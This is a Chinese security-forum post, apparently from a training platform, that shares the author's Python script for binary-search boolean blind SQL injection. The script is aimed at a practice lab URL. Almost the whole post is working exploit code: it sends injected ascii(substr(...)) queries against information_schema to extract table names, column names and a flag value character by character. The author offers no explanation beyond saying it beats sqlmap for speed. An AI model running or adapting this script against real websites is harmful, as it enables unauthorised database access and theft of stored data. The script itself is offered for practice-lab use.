基于二分法的sql布尔盲注脚本

kanjin   ·   发表于 2021-02-03 21:45:11   ·   技术文章

代码写的很潦草,自用保存。但是速度比sqlmap快多了。
`

  1. import requests
  2. url2="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}"
  3. url3="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}"
  4. def table_name(url2,url3):
  5. strstr=""
  6. j = 1
  7. while(True):
  8. min=0
  9. max=122
  10. i=0
  11. flag=1
  12. flag1=2
  13. while(True):
  14. i+=1
  15. mid=(max+min)//2
  16. pon=requests.get(url2.format(j,mid)).text
  17. if(pon.find("有数据")==-1):
  18. max=mid
  19. if(i%3==0):
  20. flag=mid
  21. else:
  22. flag1=mid
  23. if(flag1==flag):
  24. print("结束")
  25. return strstr
  26. elif(requests.get(url3.format(j,int(mid+1))).text.find("有数据")!=-1):
  27. #print("匹配了"+str(i)+"次")
  28. print(chr(mid+1),end="")
  29. strstr+=chr(mid+1)
  30. j+=1
  31. break
  32. else:
  33. min=mid
  34. url4="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='loflag'),{},1))>{}"
  35. url5="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='loflag'),{},1))={}"
  36. def column_name(url4,url5):
  37. columnName=""
  38. j=1
  39. while(True):
  40. max=122
  41. min=0
  42. i=0
  43. flag=1
  44. flag1=0
  45. while(True):
  46. i+=1
  47. mid=(max+min)//2
  48. if(requests.get(url4.format(j,mid)).text.find("有数据")==-1):
  49. max=mid
  50. if(i%2==0):
  51. flag=mid
  52. else:
  53. flag1=mid
  54. if(flag==flag1):
  55. return columnName
  56. elif(requests.get(url5.format(j,mid+1)).text.find("有数据")!=-1):
  57. print(chr(mid+1),end="")
  58. j+=1
  59. columnName+=chr(mid+1)
  60. break
  61. else:
  62. min=mid
  63. def flag(columnList):
  64. url5 = "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat({}) from loflag),{},1))>{}"
  65. url6 = "http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat({}) from loflag),{},1))={}"
  66. for l in columnList:
  67. Flag=""
  68. j = 1
  69. flag = 1
  70. flag1 = 0
  71. while (True):
  72. max = 122
  73. min = 0
  74. i = 0
  75. if (flag == flag1):
  76. break
  77. while (True):
  78. i += 1
  79. mid = (max + min) // 2
  80. if (requests.get(url5.format(l,j, mid)).text.find("有数据") == -1):
  81. max = mid
  82. if (i % 2 == 0):
  83. flag = mid
  84. else:
  85. flag1 = mid
  86. if (flag == flag1):
  87. print(Flag)
  88. break
  89. elif (requests.get(url6.format(l,j, mid + 1)).text.find("有数据") != -1):
  90. print(chr(mid + 1), end="")
  91. j += 1
  92. Flag += chr(mid + 1)
  93. break
  94. else:
  95. min = mid
  96. if __name__=="__main__":
  97. #str= table_name(url2,url3)
  98. #print(str)
  99. #columnName=column_name(url4,url5)
  100. columnName="Id,flagloId,flaglo"
  101. columnList=columnName.split(",")
  102. print(columnList)
  103. flag(columnList)

`

运行截图

`

用户名金币积分时间理由
veek 50.00 0 2021-02-04 15:03:28 有代码注释和思路就更好了~

打赏我,让我更有动力~

0 条回复   |  直到 2021-2-3 | 1155 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.